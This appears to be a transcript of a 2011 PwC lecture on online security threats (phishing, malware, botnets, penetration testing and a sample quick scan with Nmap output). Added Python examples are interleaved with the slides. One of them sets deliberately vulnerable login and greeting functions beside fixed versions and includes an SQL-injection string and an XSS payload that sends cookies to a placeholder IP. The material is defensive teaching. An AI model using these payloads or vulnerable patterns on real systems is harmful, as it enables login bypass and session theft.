pwc lunchlezing inter-actief - the internet - what is out there
TRANSCRIPT
The Internet – What is out there?
Lunch lecture Inter-Actief, 25 October 2011, Enschede
www.pwc.nl
PwC
Introduction
• Information security is a continuous process that gives an organization control over its IT security risks, i.e. the risks of losing availability, integrity or confidentiality of information.
• It protects critical business assets.
• It spans organization, technology and people.
• CIA triad (confidentiality, integrity, availability) and its mirror image, the DAD triad (disclosure, alteration, destruction): the three properties to protect and the three ways they fail.
• In 2009 there were 159 recorded incidents of unauthorized access to critical business data by hackers.
• What about the unrecorded incidents?
Developments in security threats and what you can do about it
Developments in security threats
What do we see in practice regarding online security threats?
Cybercrime (incl. botnets, phishing)
Malware (incl. viruses, trojans)
Hacking
Cybercrime
What is cybercrime?
The Council of Europe's Cybercrime Treaty uses the term 'cybercrime' to refer to offenses ranging from criminal activity against data to content and copyright infringement [Krone, 2005].
However, others [Zeviar-Geese, 1997-98] suggest that the definition is broader, including activities such as fraud, unauthorized access, child pornography, and cyberstalking.
The United Nations Manual on the Prevention and Control of Computer Related Crime includes fraud, forgery, and unauthorized access [United Nations, 1995] in its cybercrime definition.
Cybercrime
So cybercrime covers a very wide range of attacks. Understanding this variation matters, because different types of cybercrime call for different defences.
We often see:
Phishing
Malware
Botnets
Phishing
Phishing is an attempt to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.
Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter their details on a fake website whose look and feel closely mimic the legitimate one.
Phishing is an example of social engineering: it deceives the user rather than breaking the software.
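The mismatch described above, a message that looks like it comes from a trusted site but links somewhere else, is something a mail gateway or a reviewer can check mechanically. The following is an added example (Python), not code from the PwC slides: it collects the links in an HTML e-mail and flags those whose visible text names the trusted domain while the href leaves it, or whose target is a bare IP address. The message and the domains in it are constructed for the example; the two-label "registrable domain" helper is a simplification and is labelled as such.

```python
"""Heuristic check for a common phishing pattern: an HTML e-mail whose visible
link text shows a trustworthy domain while the href points somewhere else.

Added example; not from the original slides. The message below is constructed
for illustration; the domains in it are placeholders, not real sites.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self._href = None
        self._text = []
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Crude 'last two labels' approximation of the registrable domain.
    Assumption made for the example; real code should use a public-suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_of(text_or_url):
    """Extract a hostname from a URL or from a bare 'www.example.com' string."""
    candidate = text_or_url.strip()
    if "://" not in candidate:
        candidate = "http://" + candidate
    return urlparse(candidate).hostname or ""


def suspicious_links(html_body, trusted_domain):
    """Return links whose href leaves trusted_domain while the visible text
    claims to be that domain, or whose href is a raw IP address."""
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        href_host = host_of(href)
        text_host = host_of(text) if "." in text else ""
        reasons = []
        if (text_host and registrable_domain(text_host) == trusted_domain
                and registrable_domain(href_host) != trusted_domain):
            reasons.append("visible text shows %s but link goes to %s" % (text_host, href_host))
        if href_host.replace(".", "").isdigit():
            reasons.append("link target is a bare IP address")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample message, modelled on the bank-style phishing mail the
# slides describe. Domains and the IP address are placeholders.
SAMPLE_MAIL = """
<p>Dear customer, your account has been locked.</p>
<p>Please log in at <a href="http://example-bank.login-verify.net/">www.example-bank.com</a>
to restore access.</p>
<p>Help: <a href="https://www.example-bank.com/help">www.example-bank.com/help</a></p>
<p>Or use <a href="http://203.0.113.10/login">this link</a>.</p>
"""

if __name__ == "__main__":
    for f in suspicious_links(SAMPLE_MAIL, "example-bank.com"):
        print(f["href"], "->", "; ".join(f["reasons"]))
```

On the constructed message the check flags the first and the third link and passes the genuine help link. It is a heuristic: attackers also use look-alike domains, URL shorteners and homoglyphs that this simple domain comparison does not catch, so it belongs beside user awareness training, not instead of it.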
Malware
Malware includes:
Computer viruses
Worms
Trojan horses
Scareware
Rootkits
….and other malicious software or programs.
Malware (figure; source: GOVCERT.NL)
Malware
Computer viruses: programs that attach themselves to files (.exe, .com) and infect a computer when the file is run. They need human interaction to spread.
Worms: self-replicating programs that copy themselves to other computers over the network, using known exploits for software vulnerabilities. They spread without human interaction.
Malware
Trojan horses: legitimate-looking programs that create a backdoor on a computer. Trojans often perform a function the user wants while opening access to the system without the user's knowledge.
Rootkits: a rootkit is a program that hides activity and processes on a computer. It is often used in combination with a worm or Trojan horse to conceal their activity.
Interesting read on rootkits: http://blogs.technet.com/b/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx
Malware
Scareware: several classes of software with malicious payloads, or payloads of little or no benefit, sold to consumers through unethical marketing. The sales pitch uses social engineering to cause shock, anxiety or the perception of a threat, typically a fake warning that the computer is infected.
Malware world-wide concentrations 2010
Source for this image and the statistics on the following slides: Microsoft's Security Intelligence Report (www.microsoft.com/sir)
Malware – metrics Netherlands 2010
Botnets
Computers become nodes in a botnet when attackers illicitly install malware that secretly connects them to the botnet.
The bots perform tasks such as sending spam, hosting or distributing malware or other illegal files, or attacking other computers.
Attackers usually install bots by exploiting vulnerabilities in software or by using social engineering to trick users into installing the malware.
Users are often unaware that their computers are being used for malicious purposes.
Botnet software for sale on the black market (figure)
Drive-by downloads
Detected security breaches Q3 2009 – Q4 2010
Hacking
Hacking
Wikileaks became world news when it published sensitive material about the wars in Afghanistan and Iraq, including video of a US airstrike that killed a dozen people, reporters and children among them.
Around December 2010 it began releasing 251,000 diplomatic cables; this became known as 'Cablegate'.
The founder of Wikileaks, Julian Assange, was arrested.
Several companies suspended their services to Wikileaks.
Hacking
Recent hacks with high impact:
Hacking
Hacker groups are rising in number and activity.
They publish passwords, internal network diagrams and databases to the public.
One hacker group recently disclosed 62,000 credentials, Sony's network diagram, etc.
Hacking
Software vulnerabilities are one of the most important causes of successful hacks.
Mitigation: install patches and updates for the operating system and for third-party software, not just the OS.
Hacking
Trends in security:
• Vulnerabilities are moving towards the web application level
• Loss of data through cybercrime is a structural problem
• Obsolescence of cryptography is underestimated
• Websites are on the radar of criminals, disgruntled employees, journalists and competitors
(source: GOVCERT)
Hacking
A penetration test is the process of identifying and actively exploiting vulnerabilities in an information technology environment. Penetration tests…
• should be performed by experienced professionals.
• are much more than an automated vulnerability scan.
• are typically performed by penetration testers with very limited knowledge of the target environment (to emulate common external threats).
• are sometimes referred to as an “attack and penetration study”, “pentest”, or “ethical hack”.
• entail automated and manual testing procedures.
• should be performed on – at least – an annual basis.
Hacking
Internet-based penetration testing
• Security testing focused on Internet-facing corporate resources.
• Goal is to gain access to the “crown jewels” within the internal network via Internet-facing resources.
• Most companies have publicly accessible network address space.
• Validation of the IP address ranges supplied by client and network footprint scanning.
• Examine the weaknesses found, analyze susceptibility to attacks, and attempt to exploit vulnerabilities.
Wireless penetration testing
• Security testing focused on the wireless environment.
• Goal is to gain access to the “crown jewels” in the internal network via the wireless infrastructure.
• Wireless networks have become very common and pose significant security risks.
• Wireless access point identification and mapping.
• Active penetration testing from publicly accessible areas.
Hacking
Dial-up penetration testing
• Security testing is focused on dial up devices.
• Goal is to gain access to the “crown jewels” in the internal network via dialup resources.
• Unauthorized or insecure dial-up devices.
• Automated software to dial the supplied telephone ranges to identify carriers.
• Active penetration testing of identified dial-up devices.
Web application penetration testing
• Security testing is focused on external and internal web-based applications.
• Goal is to gain privileged access to the application or to gain access to other users' data within the application.
• The tester is supplied with accounts of varying profiles or access levels.
• Focused on application level vulnerabilities (OWASP).
Hacking
Physical security controls testing
• Security testing is focused on gaining physical access to corporate facilities, data centers, or other secured locations.
• Typically involves an element of social engineering.
Internal penetration testing
• Security testing is focused on internal systems, applications, databases, and network infrastructure.
• Goal is to gain access to the “crown jewels” within the internal network.
• Testing performed on the internal network perimeter simulating threats posed by employees and third parties with physical access to the facility.
• Performed according to the same methodology and approach as the Internet-based penetration testing phase.
Vulnerability scanner
Application vulnerabilities OWASP Top 10
Source: The Open Web Application Security Project (OWASP) – https://www.owasp.org/
OWASP application level scanner
The anatomy of a security quick scan
Example quick scan performed on:
Firewall
Website
Windows 2003 servers
Approach
First, we've looked at the filtering of the firewall, e.g. which entry points are open and which routes are blocked?
Firewall – external at service provider
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
465/tcp open ssl/smtp qmail smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
3306/tcp open mysql MySQL 4.1.22
5432/tcp open postgresql PostgreSQL DB 7.4.12 - 7.4.25
8443/tcp open http Apache httpd
So what? What's the problem with this?
Firewall – external at service provider
The same listing, grouped by what is actually listening on the Internet-facing address:
E-mail server: 106/tcp pop3pw, 110/tcp pop3, 143/tcp imap (plain-text protocols; passwords cross the Internet unencrypted)
Secure e-mail: 465/tcp ssl/smtp, 993/tcp ssl/imap, 995/tcp ssl/pop3
Databases: 3306/tcp MySQL 4.1.22, 5432/tcp PostgreSQL 7.4 (database listeners reachable directly from the Internet)
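The "so what" question can be answered mechanically before the vulnerability scanner runs. The following is an added example (Python), not part of the PwC slides: it parses the Nmap service listing above and reports which open services should not be reachable from the Internet at all, which carry credentials in clear text, and which advertise outdated software. The listing is the one from the slide; the exposure policy and the minimum versions are assumptions made for the example, not an authoritative end-of-life list.

```python
"""Triage of an Nmap service listing: which of the listening services on an
Internet-facing host should not be reachable from the Internet at all, and
which advertise outdated software.

Added example, not part of the original slides. The listing below is the one
shown on the slide; the exposure policy and minimum versions are assumptions
made for the example, not an authoritative end-of-life list.
"""
import re

NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
465/tcp open ssl/smtp qmail smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
3306/tcp open mysql MySQL 4.1.22
5432/tcp open postgresql PostgreSQL DB 7.4.12 - 7.4.25
8443/tcp open http Apache httpd
"""

# Example exposure policy (assumption): services that have no business being
# reachable from the Internet on a web/mail host, and why.
NOT_FOR_INTERNET = {
    "mysql": "database listener; should only be reachable from the application tier",
    "postgresql": "database listener; should only be reachable from the application tier",
    "pop3pw": "password-change service; exposes account credentials to brute force",
}
# Services that carry credentials in clear text unless wrapped in TLS.
CLEARTEXT_CREDENTIALS = {"ftp", "pop3", "imap"}

# Example minimum acceptable versions (assumption for the example; check the
# vendor's support matrix on a real engagement).
MIN_VERSION = {
    "Apache httpd": (2, 2),
    "MySQL": (5, 0),
    "PostgreSQL": (8, 2),
}

LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Parse 'PORT STATE SERVICE VERSION' lines into dicts; skip the header."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return services


def version_tuple(version_text, product):
    """First dotted version after the product name, e.g.
    'PostgreSQL DB 7.4.12 - 7.4.25' -> (7, 4, 12); None if no version shown."""
    m = re.search(re.escape(product) + r"\D*?(\d+(?:\.\d+)+)", version_text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def triage(services):
    """Return (port, finding) pairs a reviewer would raise from the listing."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        name = s["service"]
        if name in NOT_FOR_INTERNET:
            findings.append((s["port"], "exposed %s: %s" % (name, NOT_FOR_INTERNET[name])))
        if name in CLEARTEXT_CREDENTIALS:
            findings.append((s["port"], "%s without TLS: credentials cross the Internet in clear text" % name))
        for product, minimum in MIN_VERSION.items():
            v = version_tuple(s["version"], product)
            if v is not None and v[:len(minimum)] < minimum:
                findings.append((s["port"], "outdated %s %s (policy minimum %s)" % (
                    product, ".".join(map(str, v)), ".".join(map(str, minimum)))))
    return findings


if __name__ == "__main__":
    for port, finding in triage(parse_nmap(NMAP_OUTPUT)):
        print("%5d  %s" % (port, finding))
```

On this listing the script flags the two database listeners and pop3pw as services that should be filtered, FTP, POP3 and IMAP as clear-text credential channels, and the Apache 2.0.52, MySQL 4.1 and PostgreSQL 7.4 banners as outdated; the TLS-wrapped mail services pass. Banners can be hidden or faked, so each hit is confirmed with a vulnerability scanner, which is the next step in the quick scan.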
PwC
Approach
The open ports are found; now let's see if there are any known vulnerabilities for the listening services.
We have done this by using a vulnerability scanner.
Vulnerability scanner (figures)
Approach
Next, we have analyzed the website for known vulnerabilities according to the OWASP list.
We have done this by using an application layer vulnerability scanner.
Vulnerabilities with high risk on the website:
Outdated software (Apache, PHP)
Cross site scripting (XSS)
Injection flaws
Can lead to:
Unauthorized access
Website defacement (reputational damage)
SQL manipulation
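The two high-risk findings from the website scan, injection flaws and cross-site scripting, come down to the same mistake: user input is concatenated into a statement that another parser (the database, the browser) then interprets. The following is an added example (Python with the standard-library sqlite3 and html modules), not code from the scanned website or from the slides: each vulnerable function sits beside its hardened form, and the schema, the two users and the attacker inputs are constructed for the example.

```python
"""The two high-risk web findings from the quick scan, injection and cross-site
scripting, shown as a vulnerable snippet beside its hardened form.

Added example, not code from the scanned website or from the slides. The
schema, users and attacker inputs are constructed for the example; the
*_vulnerable functions are deliberately insecure and exist only to show the flaw.
"""
import html
import sqlite3


def make_db():
    """In-memory database with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "correct horse", 1), ("bob", "hunter2", 0)])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL statement."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def greet_vulnerable(name):
    """Reflects user input into HTML unescaped: the browser runs whatever is in it."""
    return "<p>Welcome, %s!</p>" % name


def greet_safe(name):
    """Escape on output so the browser treats the input as text, not markup."""
    return "<p>Welcome, %s!</p>" % html.escape(name, quote=True)


# Constructed attacker inputs.
SQLI_PAYLOAD = "' OR '1'='1"   # closes the quoted literal; the WHERE clause becomes always true
XSS_PAYLOAD = "<script>document.location='http://203.0.113.10/?c='+document.cookie</script>"


def demo():
    """Run both attacks against the vulnerable and the hardened functions."""
    conn = make_db()
    results = {
        # No valid credentials, yet the first user in the table is returned.
        "sqli_vulnerable": login_vulnerable(conn, "anyone", SQLI_PAYLOAD),
        # Same payload bound as a literal password: no match.
        "sqli_safe": login_safe(conn, "anyone", SQLI_PAYLOAD),
        "legit_safe": login_safe(conn, "bob", "hunter2"),
        "xss_vulnerable": "<script>" in greet_vulnerable(XSS_PAYLOAD),
        "xss_safe": "<script>" in greet_safe(XSS_PAYLOAD),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-16s %r" % (k, v))
```

With the payload `' OR '1'='1` the concatenated statement reads `... AND password = '' OR '1'='1'`, which is true for every row, so the vulnerable login returns the first user (here the administrator) without a password. The parameterised version compares the literal string and finds nothing. For the XSS case the fix is the same in spirit: escape at the point where data meets markup, rather than trying to filter "bad" input.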
Internal servers
Most important recommendations for the Windows platform:
Password settings can be strengthened
Audit settings can be improved
The set of services running on the servers can be reduced to what is actually needed
Questions?
© 2011 PwC. All rights reserved. Not for further distribution without the permission of PwC.
"PwC" refers to the network of member firms of PricewaterhouseCoopers International Limited
(PwCIL), or, as the context requires, individual member firms of the PwC network. Each
member firm is a separate legal entity and does not act as agent of PwCIL or any other
member firm. PwCIL does not provide any services to clients. PwCIL is not responsible or
liable for the acts or omissions of any of its member firms nor can it control the exercise of their
professional judgment or bind them in any way. No member firm is responsible or liable for the
acts or omissions of any other member firm nor can it control the exercise of another member
firm's professional judgment or bind another member firm or PwCIL in any way.
Damiën Meijer
Manager
PwC
088 - 792 58 77